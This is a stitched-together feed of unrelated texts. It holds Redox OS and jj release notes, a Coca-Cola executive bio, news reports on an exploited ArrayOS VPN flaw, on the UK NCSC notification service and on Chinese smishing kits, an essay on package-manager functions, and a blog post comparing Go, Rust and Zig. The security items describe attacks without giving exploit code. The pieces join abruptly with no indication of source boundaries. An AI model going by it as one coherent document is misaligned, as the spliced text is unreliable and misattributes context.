REPO_BINARY
option to cache downloaded packages between image rebuilds
(build) Wildan Mubarok updated Cookbook unfetch to also clean recipe binaries, removing the need to use the
uc.recipe
recipe target
(build) Wildan Mubarok did a code simplification in Cookbook which reduced dependencies
(build) Wildan Mubarok did a code simplification in the installer which reduced most dependencies
(build) Wildan Mubarok fixed some breaking changes after the Rust implementation of Cookbook
(build) Wildan Mubarok fixed the Nix flake (not tested on NixOS, only the package manager on Debian)
(build) Wildan Mubarok fixed the MacOS support on Apple Silicon
(build) Wildan Mubarok configured the default GNU FTP mirror as Berkeley university to fix very slow download speed when downloading source tarballs sometimes
(build) Ribbon fixed missing ARM64 and RISC-V emulators and reduced the QEMU installation time and size by only installing the emulators for the CPU architectures supported by Redox
Redoxer Improvements
(redoxer) Wildan Mubarok implemented a way to build and run tests from C/C++ programs
(redoxer) Wildan Mubarok fixed the toolchain downloading for Linux ARM64 distributions
(redoxer) Wildan Mubarok did a code simplification in Redoxer which reduced dependencies by half
Documentation Improvements
(doc) Ribbon updated and improved the
Coding and Building
page, now it has fully up-to-date information
(doc) Ribbon updated and improved some book pages to use the new recipe push feature to save development time
(doc) Ribbon documented the
REPO_OFFLINE
(offline mode) environment variable
(doc) Ribbon documented the
make cook
(Build the filesystem enabled recipes),
make push
(only install recipe packages with changes in an existing QEMU image),
make tree
(show the filesystem configuration recipes and recipe dependencies tree
),
make find
(show recipe packages location), and
make mount_live
(mount the live disk ISO) commands
(doc) Ribbon documented the
make x.--all
(run a recipe option in all recipes) and
make x.--category-category-name
(run a recipe option in a recipe category folder) commands
(doc) Ribbon documented the
source.shallow_clone
data type (to enable Git shallow clone in recipes)
(doc) Ribbon moved the Cookbook package policy to the
Application Porting
page and improved the recipe TODO suggestions
(doc) Wildan Mubarok documented the
CI
(disable parallel recipe fetch/build and Cookbook TUI),
COOKBOOK_MAKE_JOBS
(set the number of CPU threads for recipe compilation),
COOKBOOK_VERBOSE
(enable more recipe log information) and
COOKBOOK_LOGS
(option to save recipe logs at
build/logs/$TARGET
) environment variables
(doc) Wildan Mubarok moved the Cookbook recipe tarball mirror documentation to the “Configuration Settings” page
To test the changes of this month download the
server
or
desktop
variants of the
daily images
.
Use the
desktop
variant for a graphical interface. If you prefer a terminal-style interface, or if the
desktop
variant doesn’t work, please try the
server
variant.
If you want to test in a virtual machine use the “harddrive” images
If you want to test on real hardware use the “livedisk” images
Read the following pages to learn how to use the images in a virtual machine or real hardware:
Roberto Mercade is president of The McDonald’s Division (TMD) of The Coca‑Cola Company. He leads a global organization that is responsible for the company’s key relationship with McDonald's in more than 100 markets.
Mercade has been with Coca‑Cola since 1992, when he began his career as a production services manager in Puerto Rico. He went on to hold a number of roles before being named general manager of the Venezuela & Caribbean franchise unit in 2006.
In 2011, he became general manager in South Africa. In 2014, Mercade moved to Australia to lead the South Pacific business unit.
He returned to Latin America in 2018 as president of the Latin Center business unit. In 2021, he became the Mexico zone president.
Mercade holds a degree in industrial engineering from the Georgia Institute of Technology.
Hackers are exploiting ArrayOS AG VPN flaw to plant webshells
Bleeping Computer
www.bleepingcomputer.com
2025-12-04 23:05:05
Threat actors have been exploiting a command injection vulnerability in Array AG Series VPN devices to plant webshells and create rogue users. [...]...
Threat actors have been exploiting a command injection vulnerability in Array AG Series VPN devices to plant webshells and create rogue users.
Array Networks fixed the vulnerability in a May security update, but has not assigned an identifier, complicating efforts to track the flaw and patch management.
An
advisory
from Japan's Computer Emergency and Response Team (CERT) warns that hackers have been exploiting the vulnerability since at least August in attacks targeting organizations in the country.
The agency reports that the attacks originate from the IP address 194.233.100[.]138, which is also used for communications.
“In the incidents confirmed by JPCERT/CC, a command was executed attempting to place a PHP webshell file in the path /ca/aproxy/webapp/,” reads the bulletin (machine translated).
The flaw impacts ArrayOS AG 9.4.5.8 and earlier versions, including AG Series hardware and virtual appliances with the ‘DesktopDirect’ remote access feature enabled.
JPCERT says that
Array OS version 9.4.5.9
addresses the problem and provides the following workarounds if updating is not possible:
If the DesktopDirect feature is not in use, disable all DesktopDirect services
Use URL filtering to block access to URLs containing a semicolon
Array Networks AG Series is a line of secure access gateways that rely on SSL VPNs to create encrypted tunnels for secure remote access to corporate networks, applications, desktops, and cloud resources.
Typically, they are used by large organizations and enterprises that need to facilitate remote or mobile work.
Macnica’s security researcher,
Yutaka Sejiyama
, reported on X that his scans returned 1,831 ArrayAG instances worldwide, primarily in China, Japan, and the United States.
The researcher verified that at least 11 hosts have the DesktopDirect feature enabled, but cautioned that the possibility of more hosts with DesktopDirect active is significant.
“Because this product’s user base is concentrated in Asia and most of the observed attacks are in Japan, security vendors and security organizations outside Japan have not been paying close attention,” Sejiyama told BleepingComputer.
BleepingComputer contacted Array Networks to ask whether they plan to publish a CVE-ID and an official advisory for the actively exploited flaw, but a reply was not available by publication time.
Last year, CISA warned about active exploitation
targeting CVE-2023-28461
, a critical remote code execution in Array Networks AG and vxAG ArrayOS.
Broken IAM isn't just an IT problem - the impact ripples across your whole business.
This practical guide covers why traditional IAM practices fail to keep up with modern demands, examples of what "good" IAM looks like, and a simple checklist for building a scalable strategy.
SMS Phishers Pivot to Points, Taxes, Fake Retailers
Krebs
krebsonsecurity.com
2025-12-04 23:02:34
China-based phishing groups blamed for non-stop scam SMS messages about a supposed wayward package or unpaid toll fee are promoting a new offering, just in time for the holiday shopping season: Phishing kits for mass-creating fake but convincing e-commerce websites that convert customer payment card...
China-based phishing groups blamed for non-stop scam SMS messages about a supposed wayward package or unpaid toll fee are promoting a new offering, just in time for the holiday shopping season: Phishing kits for mass-creating fake but convincing e-commerce websites that convert customer payment card data into mobile wallets from Apple and Google. Experts say these same phishing groups also are now using SMS lures that promise unclaimed tax refunds and mobile rewards points.
Over the past week, thousands of domain names were registered for scam websites that purport to offer
T-Mobile
customers the opportunity to claim a large number of rewards points. The phishing domains are being promoted by scam messages sent via Apple’s iMessage service or the functionally equivalent RCS messaging service built into Google phones.
An instant message spoofing T-Mobile says the recipient is eligible to claim thousands of rewards points.
The website scanning service
urlscan.io
shows
thousands of these phishing domains have been deployed in just the past few days alone. The phishing websites will only load if the recipient visits with a mobile device, and they ask for the visitor’s name, address, phone number and payment card data to claim the points.
A phishing website registered this week that spoofs T-Mobile.
If card data is submitted, the site will then prompt the user to share a one-time code sent via SMS by their financial institution. In reality, the bank is sending the code because the fraudsters have just attempted to enroll the victim’s phished card details in a mobile wallet from Apple or Google. If the victim also provides that one-time code, the phishers can then
link the victim’s card to a mobile device that they physically control
.
Pivoting off these T-Mobile phishing domains in urlscan.io reveals a similar scam targeting
AT&T
customers:
An SMS phishing or “smishing” website targeting AT&T users.
Ford Merrill
works in security research at
SecAlliance
, a
CSIS Security Group
company. Merrill said multiple China-based cybercriminal groups that sell phishing-as-a-service platforms have been using the mobile points lure for some time, but the scam has only recently been pointed at consumers in the United States.
“These points redemption schemes have not been very popular in the U.S., but have been in other geographies like EU and Asia for a while now,” Merrill said.
A review of other domains flagged by urlscan.io as tied to this Chinese SMS phishing syndicate shows they are also spoofing U.S. state tax authorities, telling recipients they have an unclaimed tax refund. Again, the goal is to phish the user’s payment card information and one-time code.
A text message that spoofs the District of Columbia’s Office of Tax and Revenue.
CAVEAT EMPTOR
Many SMS phishing or “smishing” domains are quickly flagged by browser makers as malicious. But Merrill said one burgeoning area of growth for these phishing kits — fake e-commerce shops — can be far harder to spot because they do not call attention to themselves by spamming the entire world.
Merrill said the same Chinese phishing kits used to blast out package redelivery message scams are equipped with modules that make it simple to quickly deploy a fleet of fake but convincing e-commerce storefronts. Those phony stores are typically advertised on
Google
and
Facebook
, and consumers usually end up at them by searching online for deals on specific products.
A machine-translated screenshot of an ad from a China-based phishing group promoting their fake e-commerce shop templates.
With these fake e-commerce stores, the customer is supplying their payment card and personal information as part of the normal check-out process, which is then punctuated by a request for a one-time code sent by your financial institution. The fake shopping site claims the code is required by the user’s bank to verify the transaction, but it is sent to the user because the scammers immediately attempt to enroll the supplied card data in a mobile wallet.
According to Merrill, it is only during the check-out process that these fake shops will fetch the malicious code that gives them away as fraudulent, which tends to make it difficult to locate these stores simply by mass-scanning the web. Also, most customers who pay for products through these sites don’t realize they’ve been snookered until weeks later when the purchased item fails to arrive.
“The fake e-commerce sites are tough because a lot of them can fly under the radar,” Merrill said. “They can go months without being shut down, they’re hard to discover, and they generally don’t get flagged by safe browsing tools.”
Happily, reporting these SMS phishing lures and websites is one of the fastest ways to get them properly identified and shut down.
Raymond Dijkxhoorn
is the CEO and a founding member of
SURBL
, a widely-used blocklist that flags domains and IP addresses known to be used in unsolicited messages, phishing and malware distribution. SURBL has created a website called
smishreport.com
that asks users to forward a screenshot of any smishing message(s) received.
“If [a domain is] unlisted, we can find and add the new pattern and kill the rest” of the matching domains,
Dijkxhoorn
said. “Just make a screenshot and upload. The tool does the rest.”
The SMS phishing reporting site smishreport.com.
Merrill said the last few weeks of the calendar year typically see a big uptick in smishing — particularly package redelivery schemes that spoof the
U.S. Postal Service
or commercial shipping companies.
“Every holiday season there is an explosion in smishing activity,” he said. “Everyone is in a bigger hurry, frantically shopping online, paying less attention than they should, and they’re just in a better mindset to get phished.”
SHOP ONLINE LIKE A SECURITY PRO
As we can see, adopting a shopping strategy of simply buying from the online merchant with the lowest advertised prices can be a bit like playing Russian Roulette with your wallet. Even people who shop mainly at big-name online stores
can get scammed
if they’re not wary of too-good-to-be-true offers (think third-party sellers on these platforms).
If you don’t know much about the online merchant that has the item you wish to buy, take a few minutes to investigate its reputation. If you’re buying from an online store that is brand new, the risk that you will get scammed increases significantly. How do you know the lifespan of a site selling that must-have gadget at the lowest price? One easy way to get a quick idea is to run
a basic WHOIS search
on the site’s domain name. The more recent the site’s “created” date, the more likely it is a phantom store.
If you receive a message warning about a problem with an order or shipment, visit the e-commerce or shipping site directly, and avoid clicking on links or attachments — particularly missives that warn of some dire consequences unless you act quickly. Phishers and malware purveyors typically seize upon some kind of emergency to create a false alarm that often causes recipients to temporarily let their guard down.
But it’s not just outright scammers who can trip up your holiday shopping: Often times, items that are advertised at steeper discounts than other online stores make up for it by charging way more than normal for shipping and handling.
So be careful what you agree to: Check to make sure you know how long the item will take to be shipped, and that you understand the store’s return policies. Also, keep an eye out for hidden surcharges, and be wary of blithely clicking “ok” during the checkout process.
Most importantly, keep a close eye on your monthly statements. If I were a fraudster, I’d most definitely wait until the holidays to cram through a bunch of unauthorized charges on stolen cards, so that the bogus purchases would get buried amid a flurry of other legitimate transactions. That’s why it’s key to closely review your credit card bill and to quickly dispute any charges you didn’t authorize.
StardustOS: Library operating system for building light-weight Unikernels
Stardust is a unikernel operating system designed to run Cloud applications in a protected, single-address space environment. It delegates the management of physical resources to an underlying hypervisor which is treated as a trusted platform. Stardust has a small code base that can be maintained easily, and relies on static linking to combine a minimal kernel with a single application, along with the libraries and associated programming language run-time required for the execution of the application. Due to static linking, an executable binary of Stardust is packaged within an immutable single-purpose virtual machine image. Stardust supports multiple cores, preemptive threads, and basic block and networking drivers, and provides a collection of standard POSIX-compatible libraries.
Stardust is being used in supporting the teaching and research activities at the University of St Andrews.
Projects
Stardust
provides the unikernel implementation in C.
Jaradat, W., Dearle, A. and Lewis, J. Unikernel support for the deployment of light-weight, self-contained, and latency avoiding services. In the Third Annual UK System Research Challenges Workshop, United Kingdom, 2018.
McKeogh, F.,
Stardust Oxide
, Dissertation, University of St Andrews, United Kingdom.
NCSC's ‘Proactive Notifications’ warns orgs of flaws in exposed devices
Bleeping Computer
www.bleepingcomputer.com
2025-12-04 22:21:12
The UK's National Cyber Security Center (NCSC) announced the testing phase of a new service called Proactive Notifications, designed to inform organizations in the country of vulnerabilities present in their environment. [...]...
The UK's National Cyber Security Center (NCSC) announced the testing phase of a new service called Proactive Notifications, designed to inform organizations in the country of vulnerabilities present in their environment.
The service is delivered through cybersecurity firm Netcraft and is based on publicly available information and internet scanning.
The NSCS will identify organizations that lack essential security services and will contact them with specific software update recommendations that address unpatched vulnerabilities.
This may include recommendations on specific CVEs or general security issues, such as the use of weak encryption.
“Scanning and notifications will be based on external observations such as the version number publicly advertised by the software,”
NCSC explains
, adding that this activity is “in compliance with the Computer Misuse Act.”
The agency highlights that the emails sent through this service originate from
netcraft.com
addresses, do not include attachments, and do not request payments, personal, or other type of information.
BleepingComputer learned that the pilot program will cover UK domains and IP addresses from Autonomous System Numbers (ASNs) in the country.
The service will not cover all systems or vulnerabilities, though, and the recommendation is that entities do not rely on it alone for security alerts.
Early Warning is a free service from NCSC that alerts on potential cyberattacks, vulnerabilities, or other suspicious activity in a company's network.
It works by aggregating public, private, and government cyber-threat intelligence feeds and cross-referencing them with the domains and IP addresses of enrolled organizations to spot signs of active compromises.
Proactive Notification is triggered before a direct threat or compromise is detected, when NCSC becomes aware of a risk relevant to an organization’s setup.
Together, the two services will form a layered security approach. Proactive Notification helps with hardening systems and reducing risks, while Early Warning will pick up what still manages to slip through.
The NCSC has not provided a timeline for the Proactive Notifications program exiting the pilot phase and becoming more broadly available.
Broken IAM isn't just an IT problem - the impact ripples across your whole business.
This practical guide covers why traditional IAM practices fail to keep up with modern demands, examples of what "good" IAM looks like, and a simple checklist for building a scalable strategy.
When people think of package managers they usually picture installing a library but these days package managers and their associated registries handle dozens of distinct functions.
A package manager is a tool that automates the process of installing, updating, configuring, and removing software packages. In practice, modern language package managers have accumulated responsibilities far beyond this definition.
The client
An installer:
downloads a package archive from the registry, extracts it and places it in your language’s load path so your code can import it.
An updater:
checks for newer versions of installed packages, downloads them, and replaces the old versions, either one at a time or everything at once.
A dependency resolver:
when you install a package, you install its dependencies, and their dependencies, and so on, and the resolver figures out which versions can coexist, which is NP-complete and therefore slow, difficult, and full of trade-offs.
A local cache:
stores downloaded packages on disk so subsequent installs don’t hit the network, enabling offline installs and faster builds while raising questions about cache invalidation when packages change.
A command runner:
executes a package’s CLI tool without permanently installing it by downloading the package, running the command, and cleaning up, which is useful for one-off tasks or trying tools without committing to them.
A script executor:
runs scripts defined in your manifest file, whether build, test, lint, deploy, or any custom command, providing a standard way to invoke project tasks without knowing the underlying tools.
Project definition
A manifest format:
a file that declares your project’s dependencies with version constraints, plus metadata like name, version, description, author, license, repository URL, keywords, and entry points, serving as the source of truth for what your project needs.
A lockfile format:
records the exact versions of every direct and transitive dependency that were resolved, often with checksums to verify integrity, ensuring everyone working on the project gets identical dependencies.
Dependency types:
distinguishes between runtime dependencies, development dependencies, peer dependencies, and optional dependencies, each with different semantics for when they get installed and who’s responsible for providing them.
Overrides and resolutions:
lets you force specific versions of transitive dependencies when the default resolution doesn’t work, useful for patching security issues or working around bugs before upstream fixes them.
Workspaces:
manages multiple packages in a single repository, sharing dependencies and tooling across a monorepo while still publishing each package independently.
The registry
An index:
lists all published versions of a package with release dates and metadata, letting you pick a specific version or see what’s available, and is the baseline data most tooling relies on.
A publishing platform:
packages your code into an archive, uploads it to the registry, and makes it available for anyone to install, handling versioning, metadata validation, and release management.
A namespace:
every package needs a unique name, and most registries use flat namespaces where names are globally unique and first-come-first-served, making short names scarce and valuable, though some support scoped names for organizations or use reverse domain notation to avoid conflicts.
A search engine:
the registry website lets you find packages by name, keyword, or category, with results sorted by downloads, recent activity, or relevance, and is often the first place developers go when looking for a library.
A documentation host:
renders READMEs on package pages, displays changelogs, and sometimes generates API documentation from source code, with some registries hosting full documentation sites separate from the package listing.
A download counter:
tracks how often each package and version gets downloaded, helping developers gauge popularity, identify abandoned projects, and make decisions about which libraries to trust.
A dependency graph API:
exposes the full tree of what depends on what, both for individual packages and across the entire registry, which security tools use to trace vulnerability impact and researchers use to study ecosystem structure.
A CDN:
distributes package downloads across edge servers worldwide, and since a popular registry handles billions of requests per week, caching, geographic distribution, and redundancy matter because outages affect millions of builds.
A binary host:
stores and serves precompiled binaries for packages that include native code, with different binaries for different operating systems, architectures, and language versions, saving users from compiling C extensions themselves.
A build farm:
some registries compile packages from source on their own infrastructure, producing binaries that users can trust weren’t tampered with on a developer’s laptop and ensuring consistent build environments.
A mirror:
organizations run internal copies of registries for reliability, speed, or compliance, since some companies need packages to come from their own infrastructure, and registries provide protocols and tooling to make this work.
A deprecation policy:
rules for marking packages as deprecated, transferring ownership of abandoned packages, or removing code entirely, addressing what happens when a maintainer disappears or a package becomes harmful and balancing immutability against the need to fix mistakes.
Security
An authentication system:
publishers need accounts to upload packages, so registries handle signup, login, password reset, two-factor authentication, and API tokens with scopes and expiration, since account security directly affects supply chain security.
An access control system:
registries determine who can publish or modify which packages through maintainer lists, organization teams, and role-based permissions, with some supporting granular controls like publish-only tokens or requiring multiple maintainers to sign off on releases.
Trusted publishing:
some registries allow CI systems to publish packages using short-lived OIDC tokens instead of long-lived secrets, so you don’t have to store credentials in your build environment and compromised tokens expire quickly.
An audit log:
registries record who published what package, when, from what IP address, and using what credentials, useful for forensics after a compromise or just understanding how a package evolved.
Integrity verification:
registries provide checksums that detect corrupted or tampered downloads independent of signatures, so even without cryptographic verification you know you got what the registry sent.
A signing system:
registries support cryptographic signatures that verify who published a package and that it hasn’t been tampered with. Build provenance attestations can prove a package was built from specific source code in a specific environment.
A security advisory database:
registries maintain a catalog of known vulnerabilities mapped to affected package versions, so when a CVE is published they track which packages and version ranges are affected and tools can warn users.
A vulnerability scanner:
checks your installed dependencies against the advisory database and flags packages with known security issues, often running automatically during install or as a separate audit command.
A malware scanner:
registries analyze uploaded packages for malicious code before or after they’re published, where automated static analysis catches obvious patterns but sophisticated attacks often require human review.
A typosquatting detector:
registries scan for package names that look like misspellings of popular packages, which attackers register to catch developers who mistype an install command, and try to detect and block them before they cause harm.
An SBOM generator:
produces software bills of materials listing every component in your dependency tree, used for compliance, auditing, and tracking what’s actually running in production.
A security team:
registries employ people who triage vulnerability reports, investigate suspicious packages, coordinate takedowns, and respond to incidents, because automation helps but humans make the judgment calls.
So what is a package manager? It depends how far you zoom out. At the surface, it’s a command that installs libraries. One level down, it’s a dependency resolver and a reproducibility tool. Further still, it’s a publishing platform, a search engine, a security operation, and part of global infrastructure.
And how does all of this get funded and supported on an ongoing basis? Sponsorship programs, foundation grants, corporate backing, or just volunteer labor - it varies widely and often determines what’s possible.
301 redirects are being issued towards the new domain, so any existing links
should not be broken.
Fixed race condition that could cause divergent operations when running
concurrent
jj
commands in colocated repositories. It is now safe to
continuously run e.g.
jj log
without
--ignore-working-copy
in one
terminal while you're running other commands in another terminal.
#6830
jj
now ignores
$PAGER
set in the environment and uses
less -FRX
on most
platforms (
:builtin
on Windows). See
the docs
for
more information, and
#3502
for
motivation.
Breaking changes
In
filesets or path patterns
, glob matching
is enabled by default. You can use
cwd:"path"
to match literal paths.
In the following commands,
string pattern
arguments
are now parsed the same way they
are in revsets and can be combined with logical operators:
jj bookmark delete
/
forget
/
list
/
move
,
jj tag delete
/
list
,
jj git clone
/
fetch
/
push
In the following commands, unmatched bookmark/tag names is no longer an
error. A warning will be printed instead:
jj bookmark delete
/
forget
/
move
/
track
/
untrack
,
jj tag delete
,
jj git clone
/
push
The default string pattern syntax in revsets will be changed to
glob:
in a
future release. You can opt in to the new default by setting
ui.revsets-use-glob-by-default=true
.
The minimum supported Rust version (MSRV) is now 1.89.
On macOS, the deprecated config directory
~/Library/Application Support/jj
is not read anymore. Use
$XDG_CONFIG_HOME/jj
instead (defaults to
~/.config/jj
).
Sub-repos are no longer tracked. Any directory containing
.jj
or
.git
is ignored. Note that Git submodules are unaffected by this.
Deprecations
The
--destination
/
-d
arguments for
jj rebase
,
jj split
,
jj revert
,
etc. were renamed to
--onto
/
-o
. The reasoning is that
--onto
,
--insert-before
, and
--insert-after
are all destination arguments, so
calling one of them
--destination
was confusing and unclear. The old names
will be removed at some point in the future, but we realize that they are
deep in muscle memory, so you can expect an unusually long deprecation period.
jj describe --edit
is deprecated in favor of
--editor
.
The config options
git.auto-local-bookmark
and
git.push-new-bookmarks
are
deprecated in favor of
remotes.<name>.auto-track-bookmarks
. For example:
The flag
--allow-new
on
jj git push
is deprecated. In order to push new
bookmarks, please track them with
jj bookmark track
. Alternatively, consider
setting up an auto-tracking configuration to avoid the chore of tracking
bookmarks manually. For example:
jj commit
,
jj describe
,
jj squash
, and
jj split
now accept
--editor
, which ensures an editor will be opened with the commit
description even if one was provided via
--message
/
-m
.
All
jj
commands show a warning when the provided
fileset
expression
doesn't match any files.
Added
files()
template function to
DiffStats
. This supports per-file stats
like
lines_added()
and
lines_removed()
Added
join()
template function. This is different from
separate()
in that
it adds a separator between all arguments, even if empty.
RepoPath
template type now has a
absolute() -> String
method that returns
the absolute path as a string.
Added
format_path(path)
template that controls how file paths are printed
with
jj file list
.
New built-in revset aliases
visible()
and
hidden()
.
Unquoted
*
is now allowed in revsets.
bookmarks(glob:foo*)
no longer
needs quoting.
jj prev/next --no-edit
now generates an error if the working-copy has some
children.
A new config option
remotes.<name>.auto-track-bookmarks
can be set to a
string pattern. New bookmarks matching it will be automatically tracked for
the specified remote. See
the docs
.
jj log
now supports a
--count
flag to print the number of commits instead
of displaying them.
Fixed bugs
jj fix
now prints a warning if a tool failed to run on a file.
#7971
Shell completion now works with non‑normalized paths, fixing the previous
panic and allowing prefixes containing
.
or
..
to be completed correctly.
#6861
Shell completion now always uses forward slashes to complete paths, even on
Windows. This renders completion results viable when using jj in Git Bash.
#7024
Unexpected keyword arguments now return a parse failure for the
coalesce()
and
concat()
templating functions.
Nushell completion script documentation add
-f
option, to keep it up to
date.
#8007
Ensured that with Git submodules, remnants of your submodules do not show up
in the working copy after running
jj new
.
#4349
Contributors
Thanks to the people who made this release happen!
I realized recently that rather than using “the right tool for the job” I’ve
been using the tool
at
the job and that’s mostly determined the programming
languages I know. So over the last couple months I’ve put a lot of time into
experimenting with languages I don’t get to use at work. My goal hasn’t been
proficiency; I’m more interested in forming an opinion on what each language is
good for.
Programming languages differ along so many axes that it can be hard to compare
them without defaulting to the obviously true but 1) entirely boring and 2)
not-that-helpful conclusion that there are trade-offs. Of course there are
trade-offs. The important question is, why did this language commit to this
particular set of trade-offs?
That question is interesting to me because I don’t want to choose a language
based on a list of features as if I were buying a humidifier. I care about
building software and I care about my tools. In making the trade-offs they
make, languages express a set of values. I’d like to find out which values
resonate with me.
That question is also useful in clarifying the difference between languages
that, at the end of the day, have feature sets that significantly overlap. If
the number of questions online about “Go vs. Rust” or “Rust vs. Zig” is a
reliable metric, people are confused. It’s hard to remember, say, that language
X
is better for writing web services because it has features
a
,
b
, and
c
whereas language
Y
only has features
a
and
b
. Easier, I think, to
remember that language
X
is better for writing web services because language
Y
was designed by someone who hates the internet (let’s imagine) and believes
we should unplug the whole thing.
I’ve collected here my impressions of the three languages I’ve experimented
with lately: Go, Rust, and Zig. I’ve tried to synthesize my experience with
each language into a sweeping verdict on what that language values and how well
it executes on those values. This might be reductive, but, like, crystallizing
a set of reductive prejudices is sort of what I’m trying to do here.
Go
Go is distinguished by its minimalism. It has been described as “a modern C.”
Go isn’t like C, because it is garbage-collected and has a real run-time, but it
is
like C in that you can fit the whole language in your head.
You can fit the whole language in your head because Go has so few features. For
a long time, Go was notorious for not having generics. That was finally changed
in Go 1.18, but that was only after 12 years of people begging for generics to
be added to the language. Other features common in modern languages, like tagged
unions or syntactic sugar for error-handling, have not been added to Go.
It seems the Go development team has a high bar for adding features to the
language. The end result is a language that forces you to write a lot of
boilerplate code to implement logic that could be more succinctly expressed in
another language. But the result is also a language that is stable over time
and easy to read.
To give you another example of Go’s minimalism, consider Go’s slice type. Both
Rust and Zig have a slice type, but these are fat pointers and fat pointers
only. In Go, a slice is a fat pointer to a contiguous sequence in memory, but a
slice can also grow, meaning that it subsumes the functionality of Rust’s
Vec<T>
type and Zig’s
ArrayList
. Also, since Go is managing your memory for
you, Go will decide whether your slice’s backing memory lives on the stack or
the heap; in Rust or Zig, you have to think much harder about where your memory
lives.
Go’s origin myth, as I understand it, is basically this: Rob Pike was sick
of waiting for C++ projects to compile and was sick of other programmers at
Google making mistakes in those same C++ projects. Go is therefore simple where
C++ is baroque. It is a language for the programming rank and file, designed to
be sufficient for 90% of use cases while also being easy to understand, even
(perhaps especially) when writing concurrent code.
I don’t use Go at work, but I think I should. Go is minimal in
service of corporate collaboration. I don’t mean that as a slight—building
software in a corporate environment has its own challenges, which Go solves
for.
Rust
Where Go is minimalist, Rust is maximalist. A tagline often associated with
Rust is “zero-cost abstractions.” I would amend that to read, “zero-cost
abstractions, and lots of them!”
Rust has a reputation for being hard to learn. I agree with Jamie Brandon, who
writes that
it’s not lifetimes that make Rust
difficult
,
it’s the number of concepts stuffed into the language. I’m not the first person
to pick on
this particular Github
comment
,
but it perfectly illustrates the conceptual density of Rust:
The type
Pin<&LocalType>
implements
Deref<Target = LocalType>
but it
doesn’t implement
DerefMut
. The types
Pin
and
&
are
#[fundamental]
so
that an
impl DerefMut
for
Pin<&LocalType>>
is possible. You can use
LocalType == SomeLocalStruct
or
LocalType == dyn LocalTrait
and you can
coerce
Pin<Pin<&SomeLocalStruct>>
into
Pin<Pin<&dyn LocalTrait>>
.
(Indeed, two layers of Pin!!) This allows creating a pair of “smart pointers
that implement
CoerceUnsized
but have strange behavior” on stable
(
Pin<&SomeLocalStruct>
and
Pin<&dyn LocalTrait>
become the smart pointers
with “strange behavior” and they already implement
CoerceUnsized
).
Of course, Rust isn’t trying to be maximalist the same way Go is trying to be
minimalist. Rust is a complex language because what it’s trying to do is
deliver on two goals—safety and performance—that are somewhat in tension.
The performance goal is self-explanatory. What “safety” means is less clear; at
least it was to me, though maybe I’ve just been Python-brained for too long.
“Safety” means “memory safety,” the idea that you shouldn’t be able to
dereference an invalid pointer, or do a double-free, etc. But it also means more
than that. A “safe” program avoids all undefined behavior (sometimes referred
to as “UB”).
What is the dreaded UB? I think the best way to understand it is to remember
that, for any running program, there are FATES WORSE THAN DEATH. If something
goes wrong in your program, immediate termination is great actually! Because
the alternative, if the error isn’t caught, is that your program crosses over
into a twilight zone of unpredictability, where its behavior might be
determined by which thread wins the next data race or by what garbage happens
to be at a particular memory address. Now you have heisenbugs and security
vulnerabilities. Very bad.
Rust tries to prevent UB without paying any run-time performance penalty by
checking for it at compile-time. The Rust compiler is smart, but it’s not
omniscient. For it to be able to check your code, it has to understand what
your code will do at run-time. And so Rust has an expressive type system
and a menagerie of traits that allow you to express, to the compiler, what in
another language would just be the apparent run-time behavior of your code.
This makes Rust hard, because you can’t just
do
the thing! You have to find
out Rust’s name for the thing—find the trait or whatever you need—then
implement it as Rust expects you to. But if you do this, Rust can make
guarantees about the behavior of your code that other languages cannot, which
depending on your application might be crucial. It can also make guarantees
about
other people’s
code, which makes consuming libraries easy in Rust and
explains why Rust projects have almost as many dependencies as projects in the
JavaScript ecosystem.
Zig
Of the three languages, Zig is the newest and least mature. As of this writing,
Zig is only on version 0.14. Its standard library has almost zero documentation
and the best way to learn how to use it is to consult the source code directly.
Although I don’t know if this is true, I like to think of Zig as a reaction to
both Go and Rust. Go is simple because it obscures details about how the
computer actually works. Rust is safe because it forces you to jump through its
many hoops. Zig will set you free! In Zig, you control the universe and nobody
can tell you what to do.
In both Go and Rust, allocating an object on the heap is as easy as returning
a pointer to a struct from a function. The allocation is implicit. In Zig, you
allocate every byte yourself, explicitly. (Zig has manual memory management.)
You have more control here than you have even in C: To allocate bytes, you have
to call
alloc()
on a specific kind of allocator, meaning you have to decide
on the best allocator implementation for your use case.
In Rust, creating a mutable global variable is so hard that there are
long
forum
discussions
on how to do it. In Zig, you can just create one, no problem.
Undefined behavior is still important in Zig. Zig calls it “illegal behavior.”
It tries to detect it at run-time and crash the program when it occurs. For
those who might worry about the performance cost of these checks, Zig offers
four different “release modes” that you can choose from when you build your
program. In some of these, the checks are disabled. The idea seems to be that
you can run your program enough times in the checked release modes to have
reasonable confidence that there will be no illegal behavior in the unchecked
build of your program. That seems like a highly pragmatic design to me.
Another difference between Zig and the other two languages is Zig’s
relationship to object-oriented programming. OOP has been out of favor for a
while now and both Go and Rust eschew class inheritance. But Go and Rust have
enough support for other object-oriented programming idioms that you could
still construct your program as a graph of interacting objects if you wanted
to. Zig has methods, but no private struct fields and no language feature
implementing run-time polymorphism (AKA dynamic dispatch), even though
std.mem.Allocator
is
dying
to be an interface. As best as I can tell, these
exclusions are intentional; Zig is a language for
data-oriented
design
.
One more thing I want to say about this, because I found it eye-opening: It
might seem crazy to be building a programming language with manual memory
management in 2025, especially when Rust has shown that you don’t even need
garbage collection and can let the compiler do it for you. But this is a design
choice very much related to the choice to exclude OOP features. In Go and Rust
and so many other languages, you tend to allocate little bits of memory at a
time for each object in your object graph. Your program has thousands of little
hidden
malloc()
s and
free()
s, and therefore thousands of different
lifetimes.
This is RAII
. In Zig,
it might seem like manual memory management would require lots of tedious,
error-prone bookkeeping, but that’s only if you insist on tying memory
allocations to all your little objects. You could instead just allocate and
free big chunks of memory at certain sensible points in your program (like at
the start of each iteration of your event loop), and use that memory to hold
the data you need to operate on. It’s this approach that Zig encourages.
Many people
seem
confused
about
why Zig should exist if Rust does already. It’s not just that Zig is trying to
be simpler. I think this difference is the more important one. Zig wants you to
excise even more object-oriented thinking from your code.
Zig has a fun, subversive feel to it. It’s a language for smashing the
corporate class hierarchy (of objects). It’s a language for megalomaniacs and
anarchists. I like it. I hope it gets to a stable release soon, though the Zig
team’s current priority seems to be
rewriting all of their
dependencies
. It’s not impossible
they try to rewrite the Linux kernel before we see Zig 1.0.